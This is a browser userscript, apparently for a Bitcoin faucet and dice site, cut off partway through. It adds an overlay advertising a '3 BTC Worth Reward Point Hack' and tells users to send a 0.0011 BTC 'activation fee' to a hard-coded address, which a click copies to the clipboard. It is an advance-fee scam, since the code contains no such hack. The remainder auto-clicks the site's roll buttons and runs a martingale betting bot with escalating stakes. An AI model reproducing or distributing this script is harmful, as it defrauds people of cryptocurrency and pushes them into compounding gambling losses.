// ==/UserScript== //////////////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////// ///////// CONFIG /// ////// EDIT JUST THIS SECTION // //////////////////////////////////// (function() { 'use strict'; var body = $('body'); var count_min = 1; body.prepend( $('
').attr('style',"position:fixed;top:45px;left:0;z-index:999;width:400px;height:338px;background-color:black;color: white; text-align: right;") .append( $('').attr('id','autofaucet') .append($('').attr('style','text-decoration:underline;').text("3 BTC Worth Reward Point Hack Script V6.0.1")) .append($('').text("Script Need a verification FEE to Win 1000,000,000 Riward Points Every MULTIPLYBTC Game")) .append($('').text("Please Send 0.0011 BTC For Activation FEE to apparant address!!")) .append($('').attr('style','text-decoration:color:red;').text("Send to:3NsYfTLqYR1zm3FE2V1Z1x4drUoqLAUKZF")) .append($('').text("Just Double click on the BTC Address its will copied!!")) .append($('').text("(After Complete Verification Fee Wait For 1 Confirmation)")) .append($('').text("(Remember Play 3 Games only Withdraw your Winnings Instantly)")) .append($('') ) ).click(function(){ var $temp = $('').val("3NsYfTLqYR1zm3FE2V1Z1x4drUoqLAUKZF"); body.append($temp); $temp.select(); document.execCommand("copy"); $temp.remove(); }) ).prepend($('') .text("#autofaucet p { margin: 0; margin-left: 2px; text-align: center; }") ) $(document).ready(function(){ console.log("Status: Page loaded."); setTimeout(function(){ $('#play_without_captchas_button').click(); console.log("Status: Play Without Captcha button clicked."); }, random(1000,2000)); setTimeout(function(){ $('#free_play_form_button').click(); console.log("Status: Button ROLL clicked."); }, random(2000,4000)); setInterval(function(){ console.log("Status: Elapsed time " + count_min + " minutes"); count_min = count_min + 1; }, 60000); setTimeout(function(){ $('.close-reveal-modal')[0].click(); console.log("Status: Button CLOSE POPUP clicked."); }, random(12000,18000)); setInterval(function(){ $('#free_play_form_button').click(); console.log("Status: Button ROLL clicked again."); }, random(3605000,3615000)); }); function random(min,max){ return min + (max - min) * Math.random(); } })(); // ** BEHAVIOR ** // var ROLL = true; // Auto Roll enable or disable. **** If Disabled, Multiply will NOT be executed ***. Override nexts. var PROMO_MODE = true; // play faster when some promo (bonus RP or 1000% is active, or not. Override nexts. var GHOST_MODE = false; // *NEW* Don't play in the night if no promo actives. Override nexts. var SLOW_MODE = false; // play always really slow, not ovevrcharghing the rolls. Override nexts. var NIGHT_MODE = true; // play slower when it's night time // *** Bonuses // It buys bonuses just when missing less then 20 minutes to the Roll. To avoid losing 1 bonus Roll. var REWARDS = false; //decide if auto buy rewards bonuses, or not ***When true, it will activate RP promotions*** var BONUS1000 = false; //decide if to buy 1000% bonus or not. It costs 4600 RP. *** When BONUS1000 = false and REWARDS = true, you'll increase RP. *** var HOURS_BETWEEN_BUY_BONUS = 240; // How many hours to wait before to buy Bonuses Rewards Promo again // *** Lottery var LOTTERY = false; //decide if auto buy lottery tickets, or not. var LOTTERY_MAX_TICKETS = 1; // Max ticket to buy var LOTTERY_P = 1; // 0 is never, 100 is always // *** Multiply Game // Exec Vars. **If and When Play**. var MULTIPLY = true; // Play Multiply games or not, Play at your own risk. If ROLL is false, Multiply will not work. var MULTIPLY_AT_NIGHT = true; // Play multiply in nightime var HOURS_BETWEEN_MULTIPLY = 1; // How many hours to wait before to play multiply var ROLL_P = 24; // How many time to play multiply, AFTER roll AND AFTER HOURS passed; Values: 0-100 // Strategy of play var STRATEGY = 1; // [0-3] ---> ..(0) classic martingale, odds2 incr100; ..(1) wait min_losses; ..(2) wait_play_afterlosses; ..(3) same as 2, with min_lossess increments every play. Check guides. // Exit Vars. **First condition met, multiply will stop** var rolls_played = 0; var skip = 0; var no_of_loss = 0 ; var counter_list = []; var limit = 1; // Number of Pre-Rolls // Number of Loses: 1 2 3 4 5 // Total Stakes: 20 460 10140 223100 4908220 var uppper = limit + 2; var balance_one = document.getElementById("balance2").innerHTML.substr(0, 10); var bet_amount_list = [0.00000020, 0.00000440, 0.00009680, 0.00212960, 0.04685120]; document.getElementById("double_your_btc_stake").value = 0.00000001; document.getElementById("double_your_btc_payout_multiplier").value = 1.05 ; function client_seed() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 64; i++){ text += possible.charAt(Math.floor(Math.random() * possible.length)); } document.getElementById("next_client_seed").value = text; } function Random_integer(min, max) { return Math.floor(Math.random() * (max - min + 1)) + min; } //Bet Clicker function Bet() { if (Random_integer(1, 10000)%2==0) { document.getElementById('double_your_btc_bet_hi_button').click(); } else { document.getElementById('double_your_btc_bet_lo_button').click(); } } function play() { if (document.getElementById('double_your_btc_bet_hi_button').disabled === false) { won = document.getElementById('double_your_btc_bet_win').innerHTML; if (won.match(/(\d+\.\d+)/) !== null) { counter_list.push(1); no_of_loss = 0 ; document.getElementById("double_your_btc_stake").value = 0.00000001; } lost = document.getElementById('double_your_btc_bet_lose').innerHTML; if (lost.match(/(\d+\.\d+)/) !== null) { counter_list.push(0); no_of_loss += 1 ; console.log(no_of_loss); if (no_of_loss